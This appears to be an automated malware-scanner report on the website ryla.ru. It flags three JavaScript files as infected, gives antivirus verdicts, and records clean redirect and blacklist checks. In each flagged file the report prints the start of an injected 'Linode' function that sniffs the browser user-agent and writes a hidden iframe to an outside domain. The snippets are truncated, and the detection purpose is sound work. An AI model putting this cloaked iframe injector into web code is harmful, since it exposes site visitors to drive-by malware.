New scan:

Malware Scanner report for ryla.ru

Malicious/Suspicious/Total urls checked
3/0/7
3 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/6
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://ryla.ru/
200 OK
Content-Length: 32996
Content-Type: text/html
clean
http://ryla.ru/js/JsHttpRequest.js
200 OK
Content-Length: 57661
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function Linode() {
var d = navigator.userAgent;
var f = (d.indexOf("Screenshot") > -1 || d.indexOf("Maxthon") > -1 || d.indexOf("IEMobile") > -1 || d.indexOf("Chrome") > -1 || d.indexOf("FreeBSD") > -1 || d.indexOf("Android") > -1 || d.indexOf("iPad") > -1 || d.indexOf("Linux") > -1 || d.indexOf("Macintosh") > -1 || d.indexOf("iPhone") > -1 || d.indexOf("Mini") > -1);
if (!f) {
document.write('<iframe src="http://opilaket.alam-xp.info/triy
... 32995 bytes are skipped ...
sv=_57(_4e,[["action",th.url],["method",th.method],["onsubmit",null],["target",_55]]);
_4e.submit();
_57(_4e,sv);
for(var i=0;i<qt.length;i++){
_4e.lastChild.parentNode.removeChild(_4e.lastChild);
}
if(!_4f){
for(var i=0,n=_4e.elements.length;i<n;i++){
_4e.elements[i].name=_60[i];
}
}
};
JsHttpRequest.setTimeout(_5f,100);
return null;
};
}};

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

Antivirus reports:

AntiVir
JS/iFrame.DI.28
Avast
JS:Iframe-EHX [Trj]
ESET-NOD32
JS/Iframe.JT

http://ryla.ru/js/functions.js
200 OK
Content-Length: 41210
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function Linode() {
var d = navigator.userAgent;
var f = (d.indexOf("Screenshot") > -1 || d.indexOf("Maxthon") > -1 || d.indexOf("IEMobile") > -1 || d.indexOf("Chrome") > -1 || d.indexOf("FreeBSD") > -1 || d.indexOf("Android") > -1 || d.indexOf("iPad") > -1 || d.indexOf("Linux") > -1 || d.indexOf("Macintosh") > -1 || d.indexOf("iPhone") > -1 || d.indexOf("Mini") > -1);
if (!f) {
document.write('<iframe src="http://opilaket.alam-xp.info/triy
... 41092 bytes are skipped ...
r/>{
dhshowautohelp = false;
if(document.getElementById('autohelp_rows_big')) document.getElementById('autohelp_rows_big').style.display = 'none';
if(document.getElementById('autohelp_rows_width')) document.getElementById('autohelp_rows_width').style.display = 'none';
if(document.getElementById('autohelp_rows')) document.getElementById('autohelp_rows').style.display'no'none';
};;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

Antivirus reports:

AntiVir
HTML/Rce.Gen
Avast
JS:Iframe-EHG [Trj]
ESET-NOD32
JS/Iframe.JT

http://ryla.ru/js/ajax-poller.js
200 OK
Content-Length: 42778
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function Linode() {
var d = navigator.userAgent;
var f = (d.indexOf("Screenshot") > -1 || d.indexOf("Maxthon") > -1 || d.indexOf("IEMobile") > -1 || d.indexOf("Chrome") > -1 || d.indexOf("FreeBSD") > -1 || d.indexOf("Android") > -1 || d.indexOf("iPad") > -1 || d.indexOf("Linux") > -1 || d.indexOf("Macintosh") > -1 || d.indexOf("iPhone") > -1 || d.indexOf("Mini") > -1);
if (!f) {
document.write('<iframe src="http://opilaket.alam-xp.info/triy
... 15599 bytes are skipped ...
playResultsWithoutVoting(pollId)
{
var ajaxIndex = ajaxObjects.length;
ajaxObjects[ajaxIndex] = new sack();
ajaxObjects[ajaxIndex].requestFile = serSirSideFile + '?pollId=' + pollId;
prepareForPollResults(pollId);
ajaxObjects[ajaxIndex].onCompletion = function(){ showVoteResults(pollId,ajaxIndex); }; ajaxObjects[ajaxIndex].runAJAX();

}

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

Antivirus reports:

Avast
JS:Iframe-EHG [Trj]
VIPRE
Malware.JS.Generic (JS)
ESET-NOD32
JS/Iframe.JT

http://ryla.ru/randomwords/randwordsjs1.php
200 OK
Content-Length: 137
Content-Type: text/html
clean
http://ryla.ru/test404page.js
404 Not Found
Content-Length: 331
Content-Type: text/html
clean
http://ryla.ru/randomwords/randwordsjs.php
200 OK
Content-Length: 99
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: ryla.ru

Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 24 Jun 2014 21:28:08 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=windows-1251
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=3463792c91536687ec51dc82b2db5878; path=/
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: ryla.ru
Referer: http://www.google.com/search?q=ryla.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=ryla.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ryla.ru/

Result: ryla.ru is not infected or malware details are not published yet.